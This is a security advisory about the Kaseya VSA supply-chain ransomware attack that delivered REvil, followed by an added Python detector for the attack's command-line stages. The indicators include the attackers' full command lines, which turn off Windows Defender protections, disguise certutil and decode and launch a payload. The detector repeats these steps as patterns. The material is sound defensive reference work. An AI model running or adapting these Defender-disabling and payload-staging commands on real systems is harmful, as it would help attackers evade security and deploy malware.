Advisory on Kaseya VSA Ransomware Attack


Update: July 13, 2021 -- Kaseya issued a critical security update for VSA users that is available on their site - Kaseya Critical Security Update. We recommend users follow Kaseya's recommended updates as soon as possible. 

- - - - - - - - - - - - - - -

We continue to monitor and analyze the attack that used Kaseya software to deploy a variant of REvil ransomware into victims' environments. The attack targeted Kaseya's managed service provider (MSP) customers, which often provide IT support to small- and medium-size businesses. By targeting MSPs, attackers also seek to access and infiltrate the MSPs' customers' computer networks.

Guidance for Bitdefender Customers  

  • Kaseya issued an advisory and has urged their customers to immediately shut down on-premises VSA servers. We recommend that any Kaseya VSA users follow this guidance immediately.  
  • Check on-premises and hybrid environments for the known indicators of compromise (IoCs) listed below.
  • The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an alert stating that they are monitoring details about the attack against Kaseya VSA and the multiple MSPs that use VSA software. We recommend organizations follow the CISA alert for future updates. 

We continue to monitor and assess any customer impact, and will develop further guidance as appropriate, including how Bitdefender customers can protect affected systems or mitigate impacts to them. Our Labs team's findings to date indicate that Bitdefender solutions detect and block the command-line action and the delivered payloads used in the attack, protecting customers from this step of the attack. If you are a Kaseya user and believe that you are impacted, please contact us at: gzn-gs@bitdefender.com

Verified Indicators of Compromise 

  1. Command line executed from Kaseya agent: 

"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 -n 5825 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

and 

C:\WINDOWS\system32\cmd.exe /c ping 127.0.0.1 -n 3637 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\WaRCoMWorking\agent.crt c:\WaRCoMWorking\agent.exe & del /q /f c:\WaRCoMWorking\agent.crt C:\Windows\cert.exe & c:\WaRCoMWorking\agent.exe 

  2. Hashes:
  • 561cffbaba71a6e8cc1cdceda990ead4, detected by Bitdefender as Gen:Variant.Graftor.952042 from 15.May.2021. This is the main executable (c:\kworking\agent.exe) that is decoded using certutil.exe.
  • a47cf00aedf769d60d58bfe00c0b5421, detected by Bitdefender as Gen:Variant.Bulz.471680 from 13.May.2021. This is a DLL that is dropped by the main executable and side-loaded using a Microsoft msmpeng.exe executable.
  • 0293a5d21081a94a5589976b407f5675, the hash of agent.crt (the encoded content that becomes agent.exe after certutil decoding).

  3. File paths:
  • c:\WaRCoMWorking\agent.crt
  • c:\WaRCoMWorking\agent.exe
  • c:\kworking\agent.exe
  • c:\kworking\agent.crt
  • c:\windows\msmpeng.exe (an older version that is vulnerable to DLL side-loading). This version is dropped by the main executable and then used to load the DLL (a47cf00aedf769d60d58bfe00c0b5421). File version: MsMpEng.exe, Microsoft Malware Protection, 4.5.0218.0
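As an added example that is not part of Bitdefender's advisory, the Python below scores process-creation command lines (for instance, the CommandLine field of Sysmon Event ID 1 or EDR telemetry) against the stages visible in the command lines above: Defender disabled via Set-MpPreference, certutil.exe copied and padded with %RANDOM%, and a .crt decoded into an .exe, then checks whether the decoded path is one of the listed drop locations. The sample log is constructed; entry 0 is an abridged copy of the advisory's second command line, the regexes, thresholds and function names are assumptions of this example.

```python
import re

# One regex per stage of the chain seen in the advisory's command lines.
STAGES = {
    "defender_disabled": re.compile(r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+\$true", re.I),
    "certutil_copied": re.compile(r"copy\s+/Y\s+\S*certutil\.exe\s+\S*cert\.exe", re.I),
    "certutil_padded": re.compile(r"echo\s+%RANDOM%\s*>>\s*\S*cert\.exe", re.I),
    "crt_decoded": re.compile(r"\bcert(?:util)?\.exe\s+-decode\s+\S+\.crt\s+(\S+\.exe)", re.I),
}
# Drop locations listed in the advisory, compared case-insensitively.
KNOWN_PATHS = {"c:\\kworking\\agent.exe", "c:\\warcomworking\\agent.exe"}


def score_cmdline(cmdline: str) -> dict:
    """Report which stages one command line matches. 'alert' requires two or
    more stages in the same command line (the chained form in the advisory);
    a lone stage is still returned so a lower-severity rule can act on it."""
    matched = [name for name, rx in STAGES.items() if rx.search(cmdline)]
    m = STAGES["crt_decoded"].search(cmdline)
    decoded = m.group(1).lower() if m else None
    return {
        "stages": matched,
        "decoded_exe": decoded,
        "known_path": decoded in KNOWN_PATHS,
        "alert": len(matched) >= 2,
    }


def scan(lines):
    """Return (index, score) for every command line that raises an alert."""
    scored = [(i, score_cmdline(line)) for i, line in enumerate(lines)]
    return [(i, r) for i, r in scored if r["alert"]]


# Constructed sample log: entry 0 abridges the advisory's second command line,
# entry 3 is a shortened variant of the first, entries 1 and 2 are contrast cases.
SAMPLE_LOG = [
    r"C:\WINDOWS\system32\cmd.exe /c ping 127.0.0.1 -n 3637 > nul & "
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference "
    r"-DisableRealtimeMonitoring $true -DisableIOAVProtection $true -Force & "
    r"copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & "
    r"echo %RANDOM% >> C:\Windows\cert.exe & "
    r"C:\Windows\cert.exe -decode c:\WaRCoMWorking\agent.crt c:\WaRCoMWorking\agent.exe & "
    r"del /q /f c:\WaRCoMWorking\agent.crt C:\Windows\cert.exe & c:\WaRCoMWorking\agent.exe",
    r"certutil.exe -decode C:\Temp\bundle.b64 C:\Temp\bundle.pem",  # benign decode, no .crt/.exe
    r"powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true",  # single stage only
    r"cmd.exe /c copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & "
    r"C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & c:\kworking\agent.exe",
]

if __name__ == "__main__":
    for i, r in scan(SAMPLE_LOG):
        print(i, r["stages"], r["decoded_exe"], r["known_path"])
```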
